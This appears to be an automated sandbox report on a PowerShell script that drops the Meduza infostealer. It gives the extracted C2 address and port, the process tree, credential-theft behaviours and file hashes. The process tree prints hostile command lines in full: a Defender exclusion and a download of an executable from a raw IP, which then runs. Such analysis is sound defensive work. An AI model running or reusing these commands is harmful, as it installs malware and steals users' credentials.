Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
19-12-2024 07:29
Static task
static1
Behavioral task
behavioral1
Sample
script.ps1
Resource
win7-20240729-en
General
-
Target
script.ps1
-
Size
324B
-
MD5
129bf31d3dc155699387ccc33f2f3775
-
SHA1
1f43dcd5742a8f0b499892fd3e09255378817adc
-
SHA256
b1d2df274b2539ad80debafc925c0cf6a2c2394093e57a8e1d0023d3fc13dba3
-
SHA512
37f6f05e14cb7a78e7f245da4834b2be124e181c96c50a314dd29fc0c2b06c369b4510d068baf34495be5566e41a7d4852582643ce13beaded84720c3c3c9643
Malware Config
Extracted
meduza
193.3.19.151
-
anti_dbg
true
-
anti_vm
true
-
build_name
hdont
-
extensions
.txt
-
grabber_max_size
4.194304e+06
-
port
15666
-
self_destruct
false
Signatures
-
Meduza Stealer payload 1 IoCs
resource yara_rule behavioral2/files/0x000b00000001e104-92.dat family_meduza -
Meduza family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 3932 powershell.exe 16 5048 powershell.exe -
pid Process 5048 powershell.exe 3932 powershell.exe 4928 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation Launcher.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation k33ufewz.o5c.exe -
Executes dropped EXE 2 IoCs
pid Process 1388 Launcher.exe 2124 k33ufewz.o5c.exe -
Loads dropped DLL 3 IoCs
pid Process 1388 Launcher.exe 1388 Launcher.exe 1388 Launcher.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 k33ufewz.o5c.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 k33ufewz.o5c.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 k33ufewz.o5c.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 k33ufewz.o5c.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 k33ufewz.o5c.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 18 api.ipify.org 19 api.ipify.org -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Launcher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 3932 powershell.exe 3932 powershell.exe 4928 powershell.exe 4928 powershell.exe 5048 powershell.exe 5048 powershell.exe 2124 k33ufewz.o5c.exe 2124 k33ufewz.o5c.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 3932 powershell.exe Token: SeDebugPrivilege 4928 powershell.exe Token: SeDebugPrivilege 5048 powershell.exe Token: SeDebugPrivilege 2124 k33ufewz.o5c.exe Token: SeImpersonatePrivilege 2124 k33ufewz.o5c.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 1388 Launcher.exe 1388 Launcher.exe 1388 Launcher.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 3932 wrote to memory of 1388 3932 powershell.exe 84 PID 3932 wrote to memory of 1388 3932 powershell.exe 84 PID 3932 wrote to memory of 1388 3932 powershell.exe 84 PID 1388 wrote to memory of 4928 1388 Launcher.exe 86 PID 1388 wrote to memory of 4928 1388 Launcher.exe 86 PID 1388 wrote to memory of 4928 1388 Launcher.exe 86 PID 1388 wrote to memory of 5048 1388 Launcher.exe 88 PID 1388 wrote to memory of 5048 1388 Launcher.exe 88 PID 1388 wrote to memory of 5048 1388 Launcher.exe 88 PID 1388 wrote to memory of 2124 1388 Launcher.exe 91 PID 1388 wrote to memory of 2124 1388 Launcher.exe 91 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 k33ufewz.o5c.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 k33ufewz.o5c.exe
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\script.ps11⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Windows\Temp\Launcher.exe"C:\Windows\Temp\Launcher.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1388 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4928
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\k33ufewz.o5c.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5048
-
-
C:\Windows\Temp\k33ufewz.o5c.exe"C:\Windows\Temp\k33ufewz.o5c.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2124
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
1KB
MD58d80c45e0e047b75073a3d1c2710c68f
SHA1babc73cf30327b36d184239a2747ec94d48929f4
SHA2566859c4cad4b17bf02f7f25d9b5b9633491a29c1420ccbdf9342a459d5be05e64
SHA5125da876ce855d1d9a031899d283bf2ac6c53c4d14982a1300e4d128cbde46202a259d1299dfb40c81fcfe5fb6770fb00f404673c13967800392f8f8442a5d2d24
-
Filesize
18KB
MD5641a2ccbfba2faea866301b6f56093b3
SHA1fc3d317de0ebe9c8d99bbcea3f78e406e6062b29
SHA256d3894c07c306d1370579ed0617bf9368825d6bff8196400c09bbadddf0308c28
SHA512cc3f55c4780a648500dbd3102263a4a41cc0931a8ff99661207a370d9cdb1b1118bbf1705c797d8b4c58241a5c6d1b0521878955f4f009816a2bfb0005c4907f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD5e017be56699801dc89a8d6d1724eb633
SHA1a7f7aae4744210db8ebaf4da06c167357bc71eca
SHA256aa6b0863022bda1e0c263a75ae2896fe473d3bf57a76efc258b3afec8c157564
SHA5122368425dadc7f22eb11532359d4d1aa97bf3e381f4fd7b62c587e1f8819ef64a0ff7fc75cc5948939fadebc423345ab65a1cd2799bb4136fbea89d1f75dfc8c8
-
Filesize
201KB
MD52696d944ffbef69510b0c826446fd748
SHA1e4106861076981799719876019fe5224eac2655c
SHA256a4f53964cdddcccbd1b46da4d3f7f5f4292b5dd11c833d3db3a1e7def36da69a
SHA512c286bc2da757cbb2a28cf516a4a273dd11b15f674d5f698a713dc794f013b7502a8893ab6041e51bab3cdd506a18c415b9df8483b19e312f8fcb88923f42b8eb
-
Filesize
1.2MB
MD5c6813da66eba357d0deaa48c2f7032b8
SHA16812e46c51f823ff0b0ee17bfce0af72f857af66
SHA2561420f60f053c3ea5605239ee431e5f487245108b1c01be75d16b5246156fa178
SHA51219391c6b12ba8f34a5faf326f8986ef8de4729d614d72bf438c6efa569b3505159ca55f580fe2a02642e5e7a0f1b38a7a9db9f0d66d67ba548d84c230183159e